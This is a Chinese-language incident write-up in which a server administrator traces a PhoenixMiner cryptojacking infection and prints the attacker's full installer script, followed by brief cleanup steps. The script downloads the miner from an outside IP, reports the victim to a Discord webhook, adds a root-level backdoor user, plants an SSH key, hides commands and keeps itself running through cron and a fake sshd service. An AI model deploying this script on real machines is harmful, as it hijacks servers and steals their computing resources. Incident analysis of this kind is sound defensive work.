某日,发现服务器正在挖矿,问遍了大多数用户,都没有,随记录下处理过程

查看挖矿进程

  1. root@localhost:~# nvidia-smi 
  2. Thu May 27 09:30:34 2021       
  3. +-----------------------------------------------------------------------------+
  4. | NVIDIA-SMI 460.67       Driver Version: 460.67       CUDA Version: 11.2     |
  5. |-------------------------------+----------------------+----------------------+
  6. | GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
  7. | Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
  8. |                               |                      |               MIG M. |
  9. |===============================+======================+======================|
  10. |   0  GeForce GTX 108...  Off  | 00000000:04:00.0 Off |                  N/A |
  11. | 42%   72C    P2   186W / 250W |   7354MiB / 11178MiB |    100%      Default |
  12. |                               |                      |                  N/A |
  13. +-------------------------------+----------------------+----------------------+
  14. |   1  GeForce GTX 108...  Off  | 00000000:05:00.0 Off |                  N/A |
  15. | 49%   83C    P2   198W / 250W |   4519MiB / 11178MiB |    100%      Default |
  16. |                               |                      |                  N/A |
  17. +-------------------------------+----------------------+----------------------+
  18. |   2  GeForce GTX 108...  Off  | 00000000:08:00.0 Off |                  N/A |
  19. | 50%   83C    P2   188W / 250W |   4519MiB / 11178MiB |    100%      Default |
  20. |                               |                      |                  N/A |
  21. +-------------------------------+----------------------+----------------------+
  22. |   3  GeForce GTX 108...  Off  | 00000000:09:00.0 Off |                  N/A |
  23. | 45%   77C    P2   187W / 250W |   4519MiB / 11178MiB |    100%      Default |
  24. |                               |                      |                  N/A |
  25. +-------------------------------+----------------------+----------------------+
  26. |   4  GeForce GTX 108...  Off  | 00000000:84:00.0 Off |                  N/A |
  27. | 50%   83C    P2   178W / 250W |   4519MiB / 11178MiB |    100%      Default |
  28. |                               |                      |                  N/A |
  29. +-------------------------------+----------------------+----------------------+
  30. |   5  GeForce GTX 108...  Off  | 00000000:85:00.0 Off |                  N/A |
  31. | 49%   83C    P2   195W / 250W |   4519MiB / 11178MiB |    100%      Default |
  32. |                               |                      |                  N/A |
  33. +-------------------------------+----------------------+----------------------+
  34. |   6  GeForce GTX 108...  Off  | 00000000:88:00.0 Off |                  N/A |
  35. | 47%   81C    P2   200W / 250W |   4519MiB / 11178MiB |    100%      Default |
  36. |                               |                      |                  N/A |
  37. +-------------------------------+----------------------+----------------------+
  38. |   7  GeForce GTX 108...  Off  | 00000000:89:00.0 Off |                  N/A |
  39. | 49%   83C    P2   189W / 250W |   4519MiB / 11178MiB |    100%      Default |
  40. |                               |                      |                  N/A |
  41. +-------------------------------+----------------------+----------------------+
  43. +-----------------------------------------------------------------------------+
  44. | Processes:                                                                  |
  45. |  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
  46. |        ID   ID                                                   Usage      |
  47. |=============================================================================|
  48. |    0   N/A  N/A     11220      C   python                           2835MiB |
  49. |    0   N/A  N/A     23434      C   ./PhoenixMiner                   4517MiB |
  50. |    1   N/A  N/A     23434      C   ./PhoenixMiner                   4517MiB |
  51. |    2   N/A  N/A     23434      C   ./PhoenixMiner                   4517MiB |
  52. |    3   N/A  N/A     23434      C   ./PhoenixMiner                   4517MiB |
  53. |    4   N/A  N/A     23434      C   ./PhoenixMiner                   4517MiB |
  54. |    5   N/A  N/A     23434      C   ./PhoenixMiner                   4517MiB |
  55. |    6   N/A  N/A     23434      C   ./PhoenixMiner                   4517MiB |
  56. |    7   N/A  N/A     23434      C   ./PhoenixMiner                   4517MiB |
  57. +-----------------------------------------------------------------------------+

再检查进程

  2. cortex@localhost:~$ ps -ef |grep -i miner
  3. hwd      23433     1  0 08:05 ?        00:00:00 sh -c ./PhoenixMiner -restart 0 -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com 
  4. hwd      23434 23433  1 08:05 ?        00:00:59 ./PhoenixMiner -restart 0 -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com
  5. hwd      27702 27688  0 09:28 ?        00:00:00 curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar
  6. cortex   28134 27954  0 09:32 pts/4    00:00:00 grep --color=auto -i miner

好家伙,跑满了,首先先尝试 kill 进程,并且这个用户不是已知用户。

  1. kill -9 23433
  2. kill -9 23434

结果马上又立刻起来了,肯定有守护进程或者脚本之,最后在 crontab 中发现脚本

  1.  # crontab -u hwd -l 
  2.  # @daily /var/tmp/.tmp/./.b4nd1d0
  3. # @reboot /var/tmp/.tmp/./.placi > /dev/null 2>&1 & disown
  4. # * * * * * /var/tmp/.tmp/./.placi > /dev/null 2>&1 & disown
  5. # @monthly /var/tmp/.tmp/./.placi  > /dev/null 2>&1 & disown

挨个查看脚本, 相当于初始化,了解下思路

  1. cat /var/tmp/.tmp/./.b4nd1d0
  2. #!/bin/bash
  3. m1lbe1()
  4. {
  5. if ! pgrep -x PhoenixMiner >/dev/null
  6. then
  7.                 cd /var/tmp/.tmp/PhoenixMiner
  8.         ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
  9. else
  10.         exit;
  11. fi
  12. }
  13. m1lbe1
  15. 主要是检查进程`PhoenixMiner`是否存在,不存在就直接重启挖矿
  2. #!/bin/bash
  3. ###Date###
  4. user="sclipicibosu"
  5. pass="saieilamuie"
  6. gilimea='"'
  7. ip=`/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me`
  8. rm -rf *timeout
  9. sshkey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAplmD9EFVf28OUB8tK/qJYG4ggMAw9PJzJU1AONgB5FV9w1hxxmP/+vVUfj7HgaTPB94IW4svaMe3vMTkmYm/0y9Zrh8Q2r6f/r1OqpwQU3ThLR6quOAtl7TW7y4VIQ/wxXOffINAIrEv7mi8D0XgpkiFwIUoblZY0ErPjBwy0WFqua2Z0qxx1bHoznDxPOsHMRxSge4DYA0gADttEWz8x1NZFcjMql8OOQ5IpZRsHxlO4cBVG37WyYpL7NYGF0gqnRRFSXBGduQph1dsEf3KFo83/QaSg+mm+EQiFrbVeqpm9tDjiFazbrwsw0YhT47yzKPi+Tews16sIHAvs5KZkw== sclipicibosu"
  10. nenea=`whoami`s
  11. uptime=$(</proc/uptime)
  12. uptime=${uptime%%.*}
  13. zile=$(( uptime/60/60/24 ))
  14. secunde=$(( uptime%60 ))
  15. minute=$(( uptime/60%60 ))
  16. ore=$(( uptime/60/60%24 ))
  17. sended=$(date +'%m/%d/%Y')
  18. url='https://discord.com/api/webhooks/821345448212037685/UIO1CteG8cl6DerrO6fbI0ldKGk90H36NeNpXH56aYNbCBd1UZ31J89CR5ZBRSd9c3xj'
  19. ##########
  20. getingmineru(){
  21. locatie="$(cat /var/tmp/.ladyg0g0/.pr1nc35)"
  22. if [ -f $locatie/PhoenixMiner ]; then
  23.         :
  24.         else
  25.         curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar
  26.         tar xvf PhoenixMiner.tar
  27.         chmod 777 PhoenixMiner/*
  28. fi
  29. }
  30. ###
  31. locationperfection(){
  32. tinlex=$(pwd)
  33.         mkdir /var/tmp/.ladyg0g0/ >/dev/null 2>&1
  34.         echo $tinlex > "/var/tmp/.ladyg0g0/.pr1nc35"
  35.         if [ $(id -u) = 0 ]; then
  36.                 if [ -f "/usr/bin/.locationesclipiciu" ]; then
  37.                         :
  38.                 else
  39.                         echo $tinlex > "/usr/bin/.locationesclipiciu"
  40.                 fi
  41.         fi
  42. }
  43. ###
  44. showproof(){
  45. echo '
  46. {
  47.   "content": null,
  48.   "embeds": [
  49.     {
  50.       "title": "Miner ON: Ip: '$ip' | Pe User: '$nenea' ",
  51.           "description": "**Cand s-a facut Install-ul:** ***'$sended'***\n\n**Other Info:** ***Version: 3.0*** **| Uptime Miner:** ***'$zile'*** **Zile**",
  52.           "color": 16711680
  53.     }
  54.   ]
  55. }' > /tmp/.send.json
  56. /usr/bin/curl -H "Content-Type: application/json" --data @/tmp/.send.json $url
  57. }
  58. ###
  59. sshkiller(){
  60. if [ $(id -u) = 0 ]; then
  61. mkdir /usr/.SQL-Unix
  62. mkdir /usr/.SQL-Unix/.SQL
  63. echo "# .bashrc
  64. ############
  65. rm -rf ~/.bashrc
  66. rm -rf ~/.bash_history
  67. alias pkill='printf $gilimea$gilimea'
  68. alias kill='printf $gilimea$gilimea'
  69. alias killall='printf $gilimea$gilimea'
  70. alias init='printf $gilimea$gilimea'
  71. alias rm='printf $gilimea$gilimea'
  72. alias halt='printf $gilimea$gilimea'
  73. alias adduser='printf $gilimea$gilimea'
  74. alias userdel='printf $gilimea$gilimea'
  75. alias crontab='printf $gilimea$gilimea'
  76. alias htop='printf $gilimea$gilimea'
  77. alias find='printf $gilimea$gilimea'
  78. alias locate='printf $gilimea$gilimea'
  79. alias ps='printf $gilimea$gilimea'
  80. alias ss='printf $gilimea$gilimea'
  81. alias netstat='printf $gilimea$gilimea'
  82. ############
  83. echo '# .bashrc
  84.                                                                                                                                                                        source /usr/.SQL-Unix/.SQL/.db
  85. alias rm='rm -i'
  86. alias cp='cp -i'
  87. alias mv='mv -i'
  88.                                                                                                                                                                        echo Uname: $(uname -a)
  89. ' > ~/.bashrc
  90. " > /usr/.SQL-Unix/.SQL/.db
  91. echo "# .bashrc
  92.                                                                                                                                                                        source /usr/.SQL-Unix/.SQL/.db
  93. alias rm='rm -i'
  94. alias cp='cp -i'
  95. alias mv='mv -i'
  96.                                                                                                                                                                        echo Uname: $(uname -a)
  97. " > ~/.bashrc
  98. echo "
  99. if [ -f ~/.bashrc ]; then
  100.     . ~/.bashrc
  101. fi
  103. " > ~/.bash_profile
  104. chattr -i /root/.ssh ; chattr -i /root/.ssh/authorized_keys
  105. echo $sshkey > "/root/.ssh/authorized_keys"
  106. chmod 600 /root/.ssh/authorized_keys
  107. chattr +i /root/.ssh/authorized_keys
  108. else
  109. mkdir /var/tmp/.SQL-Unix > /dev/null 2>&1
  110. mkdir /var/tmp/.SQL-Unix/.SQL > /dev/null 2>&1
  111. echo "# .bashrc
  112. ############
  113. rm -rf ~/.bashrc
  114. rm -rf ~/.bash_history
  115. alias pkill='printf $gilimea$gilimea'
  116. alias kill='printf $gilimea$gilimea'
  117. alias killall='printf $gilimea$gilimea'
  118. alias init='printf $gilimea$gilimea'
  119. alias rm='printf $gilimea$gilimea'
  120. alias halt='printf $gilimea$gilimea'
  121. alias adduser='printf $gilimea$gilimea'
  122. alias userdel='printf $gilimea$gilimea'
  123. alias crontab='printf $gilimea$gilimea'
  124. alias htop='printf $gilimea$gilimea'
  125. alias find='printf $gilimea$gilimea'
  126. alias locate='printf $gilimea$gilimea'
  127. alias ps='printf $gilimea$gilimea'
  128. alias ss='printf $gilimea$gilimea'
  129. alias netstat='printf $gilimea$gilimea'
  130. ############
  131. echo '# .bashrc
  132.                                                                                                                                                                        source /var/tmp/.SQL-Unix/.SQL/.db
  133. alias rm='rm -i'
  134. alias cp='cp -i'
  135. alias mv='mv -i'
  136.                                                                                                                                                                        echo Uname: $(uname -a)
  137. ' > ~/.bashrc
  138. " > /var/tmp/.SQL-Unix/.SQL/.db
  139. echo "# .bashrc
  140.                                                                                                                                                                        source /var/tmp/.SQL-Unix/.SQL/.db
  141. alias rm='rm -i'
  142. alias cp='cp -i'
  143. alias mv='mv -i'
  144.                                                                                                                                                                        echo Uname: $(uname -a)
  145. " > ~/.bashrc
  146. echo "
  147. if [ -f ~/.bashrc ]; then
  148.     . ~/.bashrc
  149. fi
  151. " > ~/.bash_profile
  152. fi
  153. }
  154. ###
  155. facuser(){
  156. if [ $(id -u) = 0 ]; then
  157.    if ! cat /etc/passwd | grep -q "${user}"; then
  158.    /usr/sbin/useradd -u0 -g0 -o -s /bin/bash $user ; usermod -aG sudo $user
  159.    yes "$pass" | passwd $user
  160.    else
  161.                 :
  162.    fi
  163. fi
  164. }
  165. ###
  166. minerinio(){
  167. locatie="$(pwd)"
  168. if [ -f $locatie/.b4nd1d0 ]
  169. then
  170. locatie="$(pwd)"
  171. echo '#!/bin/bash
  172. m1lbe1()
  173. {
  174. if ! pgrep -x PhoenixMiner >/dev/null
  175. then
  176.                 cd '$locatie'/PhoenixMiner
  177.         ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
  178. else
  179.         exit;
  180. fi
  181. }
  182. m1lbe1' > $locatie/.b4nd1d0
  183.         chmod 777 $locatie/.b4nd1d0
  184.                 $locatie/./.b4nd1d0
  185.         else
  186.         locatie="$(pwd)"
  187. echo '#!/bin/bash
  188. m1lbe1()
  189. {
  190. if ! pgrep -x PhoenixMiner >/dev/null
  191. then
  192.         cd '$locatie'/PhoenixMiner
  193.         ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
  194. else
  195.         exit;
  196. fi
  197. }
  198. m1lbe1' > $locatie/.b4nd1d0
  199. chmod 777 $locatie/.b4nd1d0
  200. $locatie/./.b4nd1d0
  201. fi
  202. }
  203. ###
  204. crontablegend() {  
  205. locatie="$(pwd)"
  206. if ! crontab -l | grep -q '.placi'; then
  207.    rm -rf $locatie/.5p4rk3l5
  208.    echo "@daily "$locatie"/./.b4nd1d0" >> $locatie/.5p4rk3l5
  209.    sleep 1
  210.    echo "@reboot "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
  211.    sleep 1
  212.    echo "* * * * * "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
  213.    sleep 1
  214.    echo "@monthly "$locatie"/./.placi  > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
  215.    sleep 1
  216.    crontab $locatie/.5p4rk3l5
  217.    sleep 1
  218.    source ~/.bashrc
  219.    rm -rf $locatie/.5p4rk3l5
  220. fi
  221. }
  222. ###
  223. locationperfection
  224. sleep 0.5
  225. echo "Locatie ON"
  226. wait
  227. getingmineru
  228. sleep 0.5
  229. echo "Minerul Luat"
  230. wait
  231. facuser
  232. sleep 0.5
  233. echo "User Facut"
  234. wait
  235. sshkiller
  236. sleep 0.5
  237. echo "SSH Mort"
  238. wait
  239. showproof
  240. sleep 0.5
  241. echo "Info Trimis"
  242. wait
  243. crontablegend
  244. sleep 0.5
  245. echo "Crontab Done"
  246. wait
  247. minerinio
  248. sleep 0.5
  249. echo "Minerul Pornit"
  250. wait
  251. ###
  252. checkingpid(){
  253.         if [ -f /usr/bin/.pidsclip ]; then
  254.                 if ps -p $(cat /usr/bin/.pidsclip) > /dev/null; then
  255.                         echo "Already running..."
  256.                 else 
  257.                         /usr/bin/sshd > /dev/null 2>&1 & disown
  258.                         echo $! > /usr/bin/.pidsclip
  259.                         chmod 777 /usr/bin/.pidsclip
  260.                         echo "Done"
  261.                 fi
  262.         else
  263.                 /usr/bin/sshd > /dev/null 2>&1 & disown
  264.                 echo $! > /usr/bin/.pidsclip
  265.                 chmod 777 /usr/bin/.pidsclip
  266.                 echo "Done"
  267.                 fi
  268. }
  269. ###
  270. killingstrangers(){
  271. echo '
  272. #!/bin/bash
  273. locatieasdf=$(cat /usr/bin/.locationesclipiciu)
  274. if [ ! -d '$locatieasdf' ]; then
  275.         mkdir '$locatieasdf'
  276.         rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
  277.         sleep 1
  278.         '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
  279. else
  280.         if [ ! -f  '$locatieasdf'/PhoenixMiner ]; then
  281.                 rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
  282.                 sleep 1
  283.                 '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
  284. fi' > /usr/bin/sshd
  285. sleep 1
  286. chmod 777 /usr/bin/sshd
  287. }
  288. ###
  289. pisamsystemu(){
  290. echo '[Unit]
  291. Description=Example systemd service.
  292. [Service]
  293. Type=simple
  294. Restart=always
  295. RestartSec=3600
  296. ExecStart=/bin/bash /usr/bin/sshd
  297. [Install]
  298. WantedBy=multi-user.target' > /lib/systemd/system/myservice.service
  299. sleep 1
  300. chmod 644 /lib/systemd/system/myservice.service
  301. systemctl enable myservice
  302. systemctl start myservice
  304. if [ -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
  305.         echo "Locatia este deja setata"
  306. else
  307.         if [ -f "/usr/bin/.locationesclipiciu" ]; then
  308.                 locationperfection
  309.                 echo "Am-rupt-locatiile-alea"
  310. sleep 1
  311.         fi
  312. fi
  313. if [ ! -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
  314.         if [ -d "/var/tmp/.ladyg0g0" ]; then
  315.                 locationperfection
  316.                 locationperfection
  317.                 echo "Locatia a fost setata"
  318.         else
  319.                 echo "Acum facem folderul"
  320.                 mkdir /var/tmp/.ladyg0g0/
  321.                 locationperfection
  322.                 locationperfection
  323.                 echo "Am setat locatia"
  324.         fi
  325. fi
  326. if [ -f $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip ]; then
  327.         if ps -p $(cat $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip) > /dev/null; then
  328.                 echo "Already running..."
  329.         else 
  330.                 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
  331.                 echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
  332.                 chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
  333.                 echo "Done"
  334.                 fi
  335. else
  336.         $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
  337.         echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
  338.         chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
  339.         echo "Done"
  340. fi
  341. }
  342. ###
  343. if [ $(id -u) = 0 ]; then
  344.         if [ ! -d /usr/bin/.locationesclipiciu ]; then
  345.         cp -avr $(cat /var/tmp/.ladyg0g0/.pr1nc35) /usr/bin/.locationesclipiciu >/dev/null 2>&1 & disown
  346.         bash -c 'yum install -y rsync >/dev/null 2>&1 & disown' || bash -c 'apt install -y rsync >/dev/null 2>&1 & disown'
  347.                 if [ ! -f /usr/bin/sshd ]; then
  348.                         killingstrangers
  349.                         pisamsystemu
  350.                         checkingpid
  351.                 fi
  352.         fi
  353. fi

措施

  • 禁止ip访问

    1. iptables -I INPUT -s ***.***.***.*** -j DROP

  • 删除用户

    1. userdel hwd -r